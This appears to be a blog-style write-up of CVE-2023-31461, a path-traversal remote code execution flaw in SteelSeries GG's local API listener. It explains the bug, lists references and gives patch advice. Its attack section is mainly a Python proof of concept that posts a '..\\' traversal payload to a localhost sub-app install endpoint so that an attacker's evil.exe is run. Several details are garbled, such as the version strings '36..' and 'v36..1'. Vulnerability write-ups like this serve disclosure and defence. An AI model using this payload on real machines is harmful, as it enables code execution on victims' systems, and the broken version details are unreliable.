CVE-2023-31461 - Exploiting SteelSeries GG’s Open API Listener for Remote Code Execution

SteelSeries GG is a popular gaming software suite used worldwide to manage hardware, macros, and other features on SteelSeries peripherals. On April 24th, 2023, a critical vulnerability (CVE-2023-31461) was disclosed that opens the door for attackers to execute their malicious code by exploiting the software’s open API listener. In simple terms, hackers can use a flaw in the way SteelSeries GG handles sub-application installations to force the software to run whatever program they want, from a location they control.

Let’s break down how CVE-2023-31461 works, what makes it dangerous, and how you might test for or protect against it.

What Is CVE-2023-31461?

When SteelSeries GG version 36.. is running, it starts an API listener—a background server that lets other applications interact with GG (like installing new features or "sub-apps"). The problem is:
This API listener doesn't check the file paths properly. Attackers can trick it into loading and running a program stored anywhere they choose by using a path traversal trick (e.g., using ../ to move up to a parent directory).

So, with the right request, an attacker can make GG automatically launch a malicious “sub-app” from their chosen folder.

Risk: This leads to REMOTE CODE EXECUTION (RCE) on the victim’s machine, with all the permissions given to SteelSeries GG.

Original References

- Vulnerabilities Detail: CVE-2023-31461
- SSD Disclosure: SteelSeries GG API Path Traversal RCE
- SteelSeries GG Release Notes / Acknowledgment

Craft Path-Traversal Payload

The exploit makes an API request to GG, telling it to “install” a new sub-app. But instead of a safe path, it uses ../ tricks to point GG toward the attacker’s .exe file.

Example Attack Request

Here’s a Python code example of how an attacker could exploit the vulnerable endpoint.

import requests

# API endpoint (replace port with actual listening port found on victim)
api_url = "http://localhost:61191/api/v1/gg/subapps/install";

# Path traversal payload: runs the attacker's binary from C:\Temp\evil.exe
payload = {
    "path": "..\\..\\..\\..\\..\\Temp\\evil.exe",
    "subapp_name": "MaliciousApp"
}

response = requests.post(api_url, json=payload)

print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

By sending this request, the SteelSeries GG service will try to install and run C:\Temp\evil.exe—no questions asked.

Proof-of-Concept (PoC)

In real attacks, code like this can be executed locally by malware, or remote attackers could chain a web-based vulnerability to target the GG listener. Detection is hard because the malicious code runs under a signed process.

A functional PoC is shared by SSD Disclosure (see their writeup), where you:

Place your .exe in a known writable directory (like the user's Temp directory).

2. Use the API to point GG’s sub-app installer to your malicious file using ../../../ path tricks.

How Can You Protect Yourself?

SteelSeries patched this vulnerability in v36..1.
If you use SteelSeries GG, make sure to update immediately. You can get the latest version here.

Conclusion

CVE-2023-31461 shows how tiny mistakes in access controls and file path checks can lead to massive risks in popular programs. Always patch promptly and pay attention to the software that hides in the background—it can become an attacker’s best friend if left unchecked.

Further Reading

- CVE-2023-31461 on NVD
- SSD Disclosure Write-up
- Official SteelSeries GG Download

Timeline

Published on: 07/20/2023 18:15:00 UTC
Last modified on: 07/27/2023 23:40:00 UTC